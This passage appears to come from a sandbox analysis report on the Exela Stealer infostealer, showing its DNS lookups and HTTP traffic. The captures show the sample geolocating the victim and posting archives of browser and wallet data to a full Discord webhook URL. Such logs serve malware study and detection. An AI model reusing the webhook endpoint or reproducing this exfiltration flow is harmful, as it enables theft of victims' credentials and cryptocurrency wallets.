                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:27.690030098 CET44349760162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:27.691143990 CET44349760162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:27.691206932 CET49760443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:27.700825930 CET49760443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:27.700903893 CET44349760162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:27.701138973 CET49760443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:27.701147079 CET44349760162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:27.701196909 CET49760443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:27.747332096 CET44349760162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:27.750382900 CET49760443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:27.905929089 CET44349760162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:27.906047106 CET44349760162.159.137.232192.168.2.4
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:27.906088114 CET49760443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:27.906599998 CET49760443192.168.2.4162.159.137.232
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:27.906614065 CET44349760162.159.137.232192.168.2.4

                                                                                                                                                                                                                                                          UDP Packets

                                                                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:05.372723103 CET5784653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:05.379848957 CET53578461.1.1.1192.168.2.4
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:19.611917019 CET6132153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:19.619671106 CET53613211.1.1.1192.168.2.4
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:23.327610970 CET5337153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:23.335537910 CET53533711.1.1.1192.168.2.4
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:24.455741882 CET6030053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:24.462455988 CET53603001.1.1.1192.168.2.4

                                                                                                                                                                                                                                                          DNS Queries

                                                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:05.372723103 CET192.168.2.41.1.1.10x24dfStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:19.611917019 CET192.168.2.41.1.1.10x32bcStandard query (0)canary.discord.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:23.327610970 CET192.168.2.41.1.1.10x1088Standard query (0)api.gofile.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:24.455741882 CET192.168.2.41.1.1.10x30dfStandard query (0)store1.gofile.ioA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                          DNS Answers

                                                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:05.379848957 CET1.1.1.1192.168.2.40x24dfNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:16.496896029 CET1.1.1.1192.168.2.40xd629No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:16.496896029 CET1.1.1.1192.168.2.40xd629No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:19.619671106 CET1.1.1.1192.168.2.40x32bcNo error (0)canary.discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:19.619671106 CET1.1.1.1192.168.2.40x32bcNo error (0)canary.discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:19.619671106 CET1.1.1.1192.168.2.40x32bcNo error (0)canary.discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:19.619671106 CET1.1.1.1192.168.2.40x32bcNo error (0)canary.discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:19.619671106 CET1.1.1.1192.168.2.40x32bcNo error (0)canary.discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:23.335537910 CET1.1.1.1192.168.2.40x1088No error (0)api.gofile.io45.112.123.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:24.462455988 CET1.1.1.1192.168.2.40x30dfNo error (0)store1.gofile.io45.112.123.227A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                                                                                                                                          • canary.discord.com
                                                                                                                                                                                                                                                          • api.gofile.io
                                                                                                                                                                                                                                                          • store1.gofile.io
                                                                                                                                                                                                                                                          • ip-api.com

                                                                                                                                                                                                                                                          HTTP Packets

                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          0192.168.2.449739208.95.112.1803512C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:05.393385887 CET124OUTGET /json HTTP/1.1
                                                                                                                                                                                                                                                          Host: ip-api.com
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                          User-Agent: Python/3.11 aiohttp/3.9.5
                                                                                                                                                                                                                                                          Jan 1, 2025 02:53:05.850951910 CET483INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Wed, 01 Jan 2025 01:53:05 GMT
                                                                                                                                                                                                                                                          Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                          Content-Length: 306
                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                          X-Ttl: 60
                                                                                                                                                                                                                                                          X-Rl: 44
                                                                                                                                                                                                                                                          Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                                                                                                                                                                                                                                          Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.189"}


                                                                                                                                                                                                                                                          HTTPS Proxied Packets

                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          0192.168.2.449751162.159.137.2324433512C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2025-01-01 01:53:20 UTC284OUTPOST /api/webhooks/1263157181906419813/b4pV0iwlt5KWRU4QEOMzoONBAdBMW4nt-dNtrU5B2-50jsFyHabL0Uos8mtD0ZVFUQNS HTTP/1.1
                                                                                                                                                                                                                                                          Host: canary.discord.com
                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                          User-Agent: Python/3.11 aiohttp/3.9.5
                                                                                                                                                                                                                                                          Content-Length: 1381
                                                                                                                                                                                                                                                          2025-01-01 01:53:20 UTC1381OUTData Raw: 7b 22 75 73 65 72 6e 61 6d 65 22 3a 20 22 45 78 65 6c 61 20 53 74 65 61 6c 65 72 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 2a 2a 2a 45 78 65 6c 61 20 53 74 65 61 6c 65 72 2a 2a 2a 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 2a 2a 2a 45 78 65 6c 61 20 53 74 65 61 6c 65 72 20 46 75 6c 6c 20 49 6e 66 6f 2a 2a 2a 22 2c 20 22 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 45 78 65 6c 61 53 74 65 61 6c 65 72 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 30 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 45 78 65 6c 61 53 74 65 61 6c 65 72 20 7c 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 71 75 69 63 61 78 64 2f 45 78 65 6c 61 2d 56 32 2e 30
                                                                                                                                                                                                                                                          Data Ascii: {"username": "Exela Stealer", "embeds": [{"title": "***Exela Stealer***", "description": "***Exela Stealer Full Info***", "url": "https://t.me/ExelaStealer", "color": 0, "footer": {"text": "https://t.me/ExelaStealer | https://github.com/quicaxd/Exela-V2.0
                                                                                                                                                                                                                                                          2025-01-01 01:53:20 UTC1335INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                          Date: Wed, 01 Jan 2025 01:53:20 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          CF-Ray: 8faee004fb481a1b-EWR
                                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                          Set-Cookie: __dcfduid=2d3dff6cc7e311efa7382e571129ae1c; Expires=Mon, 31-Dec-2029 01:53:20 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                          Via: 1.1 google
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                          x-ratelimit-limit: 5
                                                                                                                                                                                                                                                          x-ratelimit-remaining: 4
                                                                                                                                                                                                                                                          x-ratelimit-reset: 1735696401
                                                                                                                                                                                                                                                          x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wr7EJh1y8dL%2Fw3V6th3UbKgC2H3xLiEvpCLAZWPC%2Bh9QjRx7vs4e8JXKHYVmD8tJugSkpn9iFKfDFJemiciqumpvxQO0xdxy%2FrWLocp9QRpo21%2Fo00Q2AH8zZi8ueZWSwYqxNA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          Content-Security-Policy: frame-ancestors 'none'; default-src https://o64374.ingest.sentry.io; report-to csp-sentry; report-uri https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870
                                                                                                                                                                                                                                                          Reporting-Endpoints: csp-sentry=https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870
                                                                                                                                                                                                                                                          2025-01-01 01:53:20 UTC536INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 5f 73 64 63 66 64 75 69 64 3d 32 64 33 64 66 66 36 63 63 37 65 33 31 31 65 66 61 37 33 38 32 65 35 37 31 31 32 39 61 65 31 63 61 31 30 65 31 32 62 35 66 33 63 37 37 31 64 38 64 65 34 31 35 38 65 34 62 66 39 61 38 35 61 61 33 34 32 64 36 64 61 64 66 33 38 36 63 38 30 66 34 35 34 37 36 61 34 39 38 32 35 33 66 39 66 33 3b 20 45 78 70 69 72 65 73 3d 4d 6f 6e 2c 20 33 31 2d 44 65 63 2d 32 30 32 39 20 30 31 3a 35 33 3a 32 30 20 47 4d 54 3b 20 4d 61 78 2d 41 67 65 3d 31 35 37 36 38 30 30 30 30 3b 20 53 65 63 75 72 65 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 50 61 74 68 3d 2f 3b 20 53 61 6d 65 53 69 74 65 3d 4c 61 78 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 5f 63 66 72 75 69 64 3d 36 66 64 31 34 33 36 31 35 63 31 62 33 36 35
                                                                                                                                                                                                                                                          Data Ascii: Set-Cookie: __sdcfduid=2d3dff6cc7e311efa7382e571129ae1ca10e12b5f3c771d8de4158e4bf9a85aa342d6dadf386c80f45476a498253f9f3; Expires=Mon, 31-Dec-2029 01:53:20 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=6fd143615c1b365


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          1192.168.2.449752162.159.137.2324433512C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2025-01-01 01:53:20 UTC283OUTPOST /api/webhooks/1263157181906419813/b4pV0iwlt5KWRU4QEOMzoONBAdBMW4nt-dNtrU5B2-50jsFyHabL0Uos8mtD0ZVFUQNS HTTP/1.1
                                                                                                                                                                                                                                                          Host: canary.discord.com
                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                          User-Agent: Python/3.11 aiohttp/3.9.5
                                                                                                                                                                                                                                                          Content-Length: 512
                                                                                                                                                                                                                                                          2025-01-01 01:53:20 UTC512OUTData Raw: 7b 22 75 73 65 72 6e 61 6d 65 22 3a 20 22 45 78 65 6c 61 20 53 74 65 61 6c 65 72 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 2a 2a 2a 45 78 65 6c 61 20 53 74 65 61 6c 65 72 2a 2a 2a 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 2a 2a 2a 4b 65 79 77 6f 72 64 20 52 65 73 75 6c 74 2a 2a 2a 22 2c 20 22 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 45 78 65 6c 61 53 74 65 61 6c 65 72 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 30 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 45 78 65 6c 61 53 74 65 61 6c 65 72 20 7c 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 71 75 69 63 61 78 64 2f 45 78 65 6c 61 2d 56 32 2e 30 22 7d 2c 20 22 74 68 75 6d
                                                                                                                                                                                                                                                          Data Ascii: {"username": "Exela Stealer", "embeds": [{"title": "***Exela Stealer***", "description": "***Keyword Result***", "url": "https://t.me/ExelaStealer", "color": 0, "footer": {"text": "https://t.me/ExelaStealer | https://github.com/quicaxd/Exela-V2.0"}, "thum
                                                                                                                                                                                                                                                          2025-01-01 01:53:20 UTC1335INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                          Date: Wed, 01 Jan 2025 01:53:20 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          CF-Ray: 8faee0093d53ef9f-EWR
                                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                          Set-Cookie: __dcfduid=2da62d44c7e311efa50d1a16210c25e5; Expires=Mon, 31-Dec-2029 01:53:20 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                          Via: 1.1 google
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                          x-ratelimit-limit: 5
                                                                                                                                                                                                                                                          x-ratelimit-remaining: 4
                                                                                                                                                                                                                                                          x-ratelimit-reset: 1735696402
                                                                                                                                                                                                                                                          x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ERtB40tEwrVmx%2BU3q8vFhVSsfILES8xlOChWYSNsrUCTs4QHjuJ9DCYvS1IRb2fPAriCdPmoqI7TZ3fhzQCbch%2F1n%2FkotbyIQh%2FbVIYex2FARR9FpUaenNrGxPtuYlp5tQTMgw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          Content-Security-Policy: frame-ancestors 'none'; default-src https://o64374.ingest.sentry.io; report-to csp-sentry; report-uri https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870
                                                                                                                                                                                                                                                          Reporting-Endpoints: csp-sentry=https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870
                                                                                                                                                                                                                                                          2025-01-01 01:53:20 UTC536INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 5f 73 64 63 66 64 75 69 64 3d 32 64 61 36 32 64 34 34 63 37 65 33 31 31 65 66 61 35 30 64 31 61 31 36 32 31 30 63 32 35 65 35 39 62 34 64 36 63 62 37 61 64 32 32 63 30 35 30 39 64 35 34 63 35 39 66 30 61 62 30 39 38 61 34 62 62 37 65 38 31 35 32 65 35 61 37 62 65 31 37 33 62 64 38 35 64 38 64 32 38 35 66 35 66 32 38 3b 20 45 78 70 69 72 65 73 3d 4d 6f 6e 2c 20 33 31 2d 44 65 63 2d 32 30 32 39 20 30 31 3a 35 33 3a 32 30 20 47 4d 54 3b 20 4d 61 78 2d 41 67 65 3d 31 35 37 36 38 30 30 30 30 3b 20 53 65 63 75 72 65 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 50 61 74 68 3d 2f 3b 20 53 61 6d 65 53 69 74 65 3d 4c 61 78 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 5f 63 66 72 75 69 64 3d 36 66 64 31 34 33 36 31 35 63 31 62 33 36 35
                                                                                                                                                                                                                                                          Data Ascii: Set-Cookie: __sdcfduid=2da62d44c7e311efa50d1a16210c25e59b4d6cb7ad22c0509d54c59f0ab098a4bb7e8152e5a7be173bd85d8d285f5f28; Expires=Mon, 31-Dec-2029 01:53:20 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=6fd143615c1b365


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          2192.168.2.449753162.159.128.2334433512C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2025-01-01 01:53:21 UTC640OUTPOST /api/webhooks/1263157181906419813/b4pV0iwlt5KWRU4QEOMzoONBAdBMW4nt-dNtrU5B2-50jsFyHabL0Uos8mtD0ZVFUQNS HTTP/1.1
                                                                                                                                                                                                                                                          Host: canary.discord.com
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                          User-Agent: Python/3.11 aiohttp/3.9.5
                                                                                                                                                                                                                                                          Cookie: __cfruid=6fd143615c1b365a93488760119253c0efeca9f1-1735696400; __dcfduid=2d3dff6cc7e311efa7382e571129ae1c; __sdcfduid=2d3dff6cc7e311efa7382e571129ae1ca10e12b5f3c771d8de4158e4bf9a85aa342d6dadf386c80f45476a498253f9f3; _cfuvid=f9Zo6kGhFwLLlRf0gmTxz4znRm14ReN4oWDuv3iy1Uo-1735696400253-0.0.1.1-604800000
                                                                                                                                                                                                                                                          Content-Length: 707818
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=7c58c6790e0e42f1b4146154278816b7
                                                                                                                                                                                                                                                          2025-01-01 01:53:21 UTC36OUTData Raw: 2d 2d 37 63 35 38 63 36 37 39 30 65 30 65 34 32 66 31 62 34 31 34 36 31 35 34 32 37 38 38 31 36 62 37 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: --7c58c6790e0e42f1b4146154278816b7
                                                                                                                                                                                                                                                          2025-01-01 01:53:21 UTC140OUTData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 37 31 34 33 34 44 35 36 2d 31 35 34 38 2d 45 44 33 44 2d 41 45 45 36 2d 43 37 35 41 45 43 44 39 33 42 46 30 2e 7a 69 70 22 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: Content-Type: application/octet-streamContent-Disposition: form-data; name="file"; filename="71434D56-1548-ED3D-AEE6-C75AECD93BF0.zip"
                                                                                                                                                                                                                                                          2025-01-01 01:53:21 UTC16384OUTData Raw: 50 4b 03 04 14 00 00 00 00 00 a8 a6 9f 59 00 00 00 00 00 00 00 00 00 00 00 00 09 00 00 00 42 72 6f 77 73 65 72 73 2f 50 4b 03 04 14 00 00 00 00 00 a6 a6 9f 59 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 57 61 6c 6c 65 74 73 2f 50 4b 03 04 14 00 00 00 08 00 a7 a6 9f 59 8c b8 28 e0 35 7f 0a 00 78 c3 0a 00 0f 00 00 00 44 69 73 70 6c 61 79 20 28 31 29 2e 70 6e 67 54 bb 79 3c 54 ff 1b ff 7d 66 8c 6c 15 46 45 65 37 22 d2 a4 4d 84 b1 9b 21 46 a4 41 9a 11 2a 4b 25 64 37 0c 29 64 1f 7b 64 88 b2 65 8d 64 1b 2a b2 d6 58 b2 a4 42 f6 7d 1d db 2c dc a3 ef e7 77 ff ee fb 0f 8f c3 e3 9c 39 e3 31 e7 75 5d af e7 eb 7a bf 27 dc c4 58 ff 10 f7 09 6e 00 00 0e a1 90 3a a6 00 c0 ce fa 15 02 70 1e 60 1d c8 f1 54 6d d6 01 e4 6e aa af 05 14 7f 17 9e dd 3f 75 5f d3 48 13 00 ca
                                                                                                                                                                                                                                                          Data Ascii: PKYBrowsers/PKYWallets/PKY(5xDisplay (1).pngTy<T}flFEe7"M!FA*K%d7)d{ded*XB},w91u]z'Xn:p`Tmn?u_H
                                                                                                                                                                                                                                                          2025-01-01 01:53:21 UTC16384OUTData Raw: f5 fd 6f 07 2e be 36 ee a1 60 d6 1d a3 f4 5d 43 32 60 19 58 55 d3 fa 8d 64 b5 42 21 28 f4 48 ee 18 7a fd 86 cc 54 9d d5 f6 ac 45 89 1c 03 f8 34 4d a2 4f 4b 67 8e 3e 13 0b 23 fb ff f6 12 90 e3 08 8f bf d5 cc 87 af e3 6c c2 30 bb 83 33 0e e5 5d f1 a9 50 95 37 29 37 39 fa b4 b1 ce a6 b3 2e 63 2f 97 bb d1 e7 64 cb 45 ad d2 63 4f 90 1f ce 8c 9f 29 96 6a e0 54 47 a9 37 3b 84 4b 70 5a c2 41 79 78 fc 51 31 bc f9 0c 88 29 9d b6 fe 99 ff 57 61 12 e1 a5 19 19 c7 3b 71 1a e7 5e e1 1b ce e9 b7 5d 7f a5 ff 97 d1 20 aa 4b 82 1e fb a8 f5 8a ed 3b 89 af 2a 5c aa 63 c4 27 56 b9 fe df f2 97 57 9d 9f 3c 6c 9e 79 cf 31 d0 8d 87 0e 6c ac 57 3a c3 16 1c 8e de 6a 55 3f 66 26 9f d5 62 b1 d3 7e b4 89 29 4a f5 f8 8d 51 dc f8 c9 a3 c9 41 74 81 fa 46 f2 bb bf 40 f5 74 63 58 99 60 dc
                                                                                                                                                                                                                                                          Data Ascii: o.6`]C2`XUdB!(HzTE4MOKg>#l03]P7)79.c/dEcO)jTG7;KpZAyxQ1)Wa;q^] K;*\c'VW<ly1lW:jU?f&b~)JQAtF@tcX`
                                                                                                                                                                                                                                                          2025-01-01 01:53:21 UTC16384OUTData Raw: 80 65 73 6e 56 4d 7c 97 de 90 0a c5 14 7d f6 4a 4c 0b 6e ae 3b 65 9e 03 c5 99 94 b5 03 72 0b 4b e4 80 62 26 c9 31 5c a6 e0 60 26 0c 5f d7 68 5e 1d 55 21 4f 1f 8a a4 82 df 1f 6a 4b 50 66 e8 1e 9a 91 ed 3f 3c bc 51 d1 54 27 8f 5a ae 19 49 08 15 2a cc ea 4b 5b ff b9 fb ea 76 2d fa dc 45 1a 5d 6e af 3c 79 ff 4c ce 82 f6 aa 22 fc c3 51 ec 05 cc 0f 90 27 14 33 01 23 4e 9a 4c 1c 77 72 7f ea 32 a9 80 82 05 74 6c e0 5f e9 b1 40 ad 01 c3 4b f5 e7 37 6c 04 8d e1 d5 61 40 f6 54 74 83 6f 0b 59 11 90 e3 f8 30 ef 6a 5e fc 95 30 e0 cd 83 0e fa a1 37 0f bd 41 76 8e 91 60 be 72 d5 bc 07 9a 51 da f3 67 2d c3 c7 e2 8a ab 56 f3 1f fe fd 56 f9 2c b8 04 5e 0b c9 68 65 17 78 ba c4 36 67 67 ed 5a e5 70 6a a0 16 6e 66 4d 57 57 f9 f9 5a 23 d5 08 39 e9 64 bf b3 b1 ac d2 d2 dd 8f be
                                                                                                                                                                                                                                                          Data Ascii: esnVM|}JLn;erKb&1\`&_h^U!OjKPf?<QT'ZI*K[v-E]n<yL"Q'3#NLwr2tl_@K7la@TtoY0j^07Av`rQg-VV,^hex6ggZpjnfMWWZ#9d
                                                                                                                                                                                                                                                          2025-01-01 01:53:21 UTC16384OUTData Raw: 1c 6c d8 e4 29 89 13 ab 98 5d a1 e6 b3 9f cc de 32 a2 b7 c2 e9 4c 8f 36 65 2f 2a 31 73 38 ae 49 ad 44 bd bf 99 88 2c 6c 41 3d 70 a0 ef b2 49 2d 26 c5 e4 95 ef 2c 52 d4 92 e1 46 3a e0 49 64 db af 82 c8 ff d4 36 3b 27 02 2e 1a 67 8b f5 cb 6c d7 b7 35 fc 2d dc da 2f da e2 30 e5 f5 8b 5c ea 7c 49 61 f6 90 5d cd a4 ad 08 07 ce 65 8e e5 6a a7 07 c5 82 fe e0 d3 de ed 1c b1 ff 7e 4d 2f 80 41 a7 36 67 cc 5a 43 f6 8c 4f 15 01 ae 7c c3 47 ee 0f 8b db 3f d8 0f 6c 8a df 71 c3 b1 c4 de 1a 32 d0 a7 ce ec 9e da 38 ef c1 b8 fe 06 9b e9 0e 14 86 92 21 ef 78 61 2c 63 2e be c8 66 74 c0 84 f7 21 fe 56 6a 84 32 c1 c6 e8 cb a7 31 ff a8 66 77 a0 f9 57 42 8b 70 5b 92 bc 14 58 f0 79 44 a4 ee 80 cc b4 b2 69 78 d6 7c 7d bf 05 0b 8e 56 c8 ce f7 8b 9a b7 b0 2c 48 25 24 4c 47 83 b2 62
